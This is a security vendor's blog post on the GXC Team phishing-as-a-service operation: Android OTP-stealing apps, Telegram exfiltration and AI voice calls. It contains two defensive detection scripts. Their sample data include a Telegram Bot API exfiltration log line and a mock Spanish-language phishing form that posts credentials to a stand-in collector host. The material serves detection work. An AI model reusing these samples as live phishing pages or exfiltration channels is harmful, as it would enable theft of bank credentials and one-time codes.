
GXC Team: Elevating Malware-as-a-Service with AI-Powered Phishing Kits

A Spanish-speaking cybercrime group named GXC Team has been observed elevating the standard of phishing attacks by bundling phishing kits with malicious Android applications. This innovative approach has taken malware-as-a-service (MaaS) offerings to the next level. Singaporean cybersecurity firm Group-IB has been tracking this e-crime actor since January 2023, describing their solution as a “sophisticated AI-powered phishing-as-a-service platform” targeting users of more than 36 Spanish banks, various governmental bodies, and 30 institutions globally.

The phishing kit alone is priced between $150 and $900 per month. However, the bundle that includes both the phishing kit and Android malware is available for approximately $500 per month. This subscription model has widened their target base, including users from Spanish financial institutions, governmental services, e-commerce platforms, banks, and cryptocurrency exchanges in countries like the United States, United Kingdom, Slovakia, and Brazil. To date, 288 phishing domains linked to this campaign have been identified.


Combining Phishing Kits and Android Malware

What sets the GXC Team apart is their innovative method of combining phishing kits with SMS OTP stealer malware, deviating from traditional phishing attack scenarios. Instead of simply using bogus web pages to capture credentials, victims are persuaded to download a malicious Android banking app. This app, once installed, requests permissions to become the default SMS app, enabling it to intercept OTPs and other messages, which are then exfiltrated to a Telegram bot controlled by the attackers.

Security researchers Anton Ushakov and Martijn van den Berk highlighted this novel approach in their report, noting that the malicious app opens genuine bank websites in WebView, allowing users to interact normally. However, when an OTP is requested, the malware silently intercepts and forwards the SMS messages containing the OTP codes to the attackers’ Telegram chat. This mechanism enhances the credibility of the scam, making it more convincing for victims.
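The two behaviours described above, an app that registers itself as the default SMS handler and a Telegram bot used as the drop point for intercepted OTPs, both leave static and network indicators a defender can check for. The following script is an added example (not code from Group-IB, the GXC Team report, or Netizen) that triages a constructed AndroidManifest.xml for the default-SMS-handler pattern and scans constructed egress proxy lines for Telegram Bot API calls; the package name, IP addresses and bot token are placeholders.

```python
"""Static and network triage for the SMS-OTP-stealer pattern: an app that asks
to become the default SMS handler and reports to a Telegram bot.
Added example; the manifest and log lines are constructed for illustration."""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# A default SMS handler on Android must hold SMS permissions and declare
# receivers for these delivery broadcasts. A banking app has no reason to.
SMS_PERMISSIONS = {
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
}
DEFAULT_SMS_ACTIONS = {
    "android.provider.Telephony.SMS_DELIVER",
    "android.provider.Telephony.WAP_PUSH_DELIVER",
}


def triage_manifest(manifest_xml: str) -> dict:
    """Return the SMS-related indicators found in an AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    perms = {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}
    actions = {e.get(ANDROID_NS + "name") for e in root.iter("action")}
    found_perms = sorted(perms & SMS_PERMISSIONS)
    found_actions = sorted(actions & DEFAULT_SMS_ACTIONS)
    return {
        "sms_permissions": found_perms,
        "default_sms_handler": found_actions,
        # Permissions plus the delivery receiver is the default-SMS-app pattern.
        "suspicious": bool(found_perms) and bool(found_actions),
    }


# Telegram Bot API requests have the shape api.telegram.org/bot<token>/<method>.
TELEGRAM_BOT = re.compile(
    r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/(sendMessage|sendDocument)"
)


def find_telegram_exfil(log_lines):
    """Return (client, url_fragment) pairs for egress lines hitting the Bot API.
    Assumes the client address is the first whitespace-separated field."""
    hits = []
    for line in log_lines:
        m = TELEGRAM_BOT.search(line)
        if m:
            hits.append((line.split()[0], m.group(0)))
    return hits


# Constructed manifest: placeholder package name, no real app.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.placeholder.fakebank">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application>
    <receiver android:name=".SmsReceiver"
              android:permission="android.permission.BROADCAST_SMS">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_DELIVER"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Constructed proxy log: client-ip timestamp method url status.
SAMPLE_LOG = [
    "10.0.0.23 2024-01-01T10:00:00Z POST https://api.telegram.org/bot000000000:PLACEHOLDER_TOKEN/sendMessage 200",
    "10.0.0.23 2024-01-01T10:00:01Z GET https://www.example-bank.test/login 200",
    "10.0.0.45 2024-01-01T10:00:02Z GET https://web.telegram.org/ 200",
]

if __name__ == "__main__":
    print(triage_manifest(SAMPLE_MANIFEST))
    print(find_telegram_exfil(SAMPLE_LOG))
```

The manifest check is deliberately conservative: it fires only when SMS permissions and a delivery receiver appear together, which is the combination a legitimate banking app never needs. Note that the bank's own traffic in the sample log is not flagged, matching the report's observation that the app loads the genuine site in a WebView; the signal is the outbound call to the Bot API, and the user whose device makes it is the one whose OTPs are leaving.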


AI-Powered Phishing-as-a-Service (PaaS)

Among the services advertised by the GXC Team on a dedicated Telegram channel are AI-powered voice calling tools. These tools enable their customers to generate voice calls based on a series of prompts from the phishing kit, making the scams even more convincing. These calls typically impersonate bank representatives, instructing targets to provide 2FA codes, install malicious apps, or perform other actions.

The use of AI in cybercrime is not new, but its integration into phishing-as-a-service platforms is a recent development. AI-powered voice cloning can mimic human speech with “uncanny precision,” facilitating authentic-sounding phishing (vishing) schemes that aid in initial access, privilege escalation, and lateral movement within networks. This technological advancement enables threat actors to impersonate executives, colleagues, or IT support personnel, manipulating victims into revealing confidential information or taking harmful actions.

AI-powered PaaS platforms utilize machine learning algorithms to generate realistic and personalized phishing emails, which can mimic legitimate communications from trusted sources. These emails are tailored based on data gathered from social media profiles, email addresses, and other publicly available information, increasing the likelihood of deceiving the recipient. By automating the creation and distribution of phishing content, AI-powered PaaS significantly lowers the barrier to entry for cybercriminals, enabling them to launch large-scale phishing campaigns with minimal effort.

The Mechanics of AI-Powered PaaS

AI-powered PaaS platforms incorporate several advanced technologies to enhance their phishing capabilities:

  1. Natural Language Processing (NLP): NLP algorithms analyze and generate human-like text, creating convincing phishing emails that are contextually relevant and grammatically correct. This makes it harder for recipients to distinguish phishing emails from legitimate communications.
  2. Machine Learning (ML): ML models analyze past phishing campaigns to identify patterns and strategies that are most successful. These insights are used to continuously refine and improve the effectiveness of new phishing attacks.
  3. Automation: AI-powered PaaS platforms automate the entire phishing process, from email generation and distribution to data collection and analysis. This allows cybercriminals to launch and manage multiple campaigns simultaneously, increasing their reach and impact.
  4. Deep Learning: Deep learning techniques are employed to create deepfake videos and audio, which can be used in spear-phishing attacks. These realistic forgeries can impersonate trusted individuals, making social engineering attacks more convincing and effective.

AI is also used to generate vast amounts of unique content for phishing websites, automating the creation process and making it harder for security measures to detect and block these sites. The automation of content generation using large language models (LLMs) allows threat actors to create phishing content more efficiently and at a scale that would be impossible for humans to achieve.
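When every phishing site carries freshly generated text, defences that hash or fingerprint page content stop matching. One structural signal that does not depend on wording is where a login form actually sends the password. The following script is an added example (not from the original article or the report it summarises) that parses a page, finds forms containing a password field, and reports any that post credentials to a host other than the one serving the page; the two HTML pages and hostnames are constructed.

```python
"""Content-agnostic credential-form check: flag password forms that submit
off-origin, regardless of the page text around them.
Added example; the HTML samples and hostnames are constructed."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _FormScanner(HTMLParser):
    """Collect each <form>, its action, and whether it holds a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def credential_exfil_targets(page_url: str, html: str) -> list:
    """Return hosts that receive password-form submissions from a page served at
    page_url but are not that page's own host."""
    scanner = _FormScanner()
    scanner.feed(html)
    page_host = urlparse(page_url).hostname
    targets = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        # Relative (or empty) actions resolve to the page's own origin.
        target_host = urlparse(urljoin(page_url, form["action"])).hostname
        if target_host != page_host:
            targets.append(target_host)
    return targets


# Constructed pages; none of these hostnames are real sites.
LEGIT_PAGE = """<html><body>
<form method="post" action="/auth/login">
  <input name="user" type="text"><input name="pass" type="password">
</form>
<form action="https://search.bank.example/q"><input name="q" type="text"></form>
</body></html>"""

SUSPECT_PAGE = """<html><body>
<h1>Acceso seguro</h1>
<form method="post" action="https://collector.example/submit">
  <input name="dni" type="text"><input name="clave" type="password">
  <button>Entrar</button>
</form></body></html>"""

if __name__ == "__main__":
    print(credential_exfil_targets("https://bank.example/login", LEGIT_PAGE))
    print(credential_exfil_targets("https://bank-secure-login.example/", SUSPECT_PAGE))
```

The off-origin search form on the legitimate page is ignored because it carries no password field, so the check stays quiet on ordinary sites. A kit that posts to its own hosting domain will not trip this heuristic; in that case the remaining content-independent signals are the domain itself (age, lookalike spelling, certificate history) and the behaviour of the form's backend.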


Advanced Phishing Techniques and AI Integration

The rise of AI in phishing campaigns has introduced more sophisticated attack vectors. AI-driven phishing kits can create personalized, highly convincing lures that are difficult for both individuals and automated systems to detect. These kits can leverage AI to analyze social media profiles and other publicly available information to craft tailored phishing emails, increasing the likelihood of successful attacks.

Furthermore, AI enhances the adaptability of phishing campaigns. Attackers can use AI to monitor the effectiveness of their phishing attempts in real time, adjusting their strategies to improve success rates. This dynamic approach makes traditional defense mechanisms less effective, as the phishing tactics continually evolve.

AI also facilitates the deployment of deepfake technology in phishing attacks. Deepfakes, which are hyper-realistic digital forgeries created using AI, can be used to impersonate trusted individuals in voice or video communications. This can lead to more convincing social engineering attacks, where victims are tricked into performing actions they would not ordinarily undertake, such as transferring funds or disclosing sensitive information.


How Can Netizen Help?

Netizen ensures that security gets built-in and not bolted-on. We provide advanced solutions to protect critical IT infrastructure, such as the popular “CISO-as-a-Service”, wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.

We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.

Questions or concerns? Feel free to reach out to us any time –

https://www.netizen.net/contact


Copyright © Netizen Corporation. All Rights Reserved.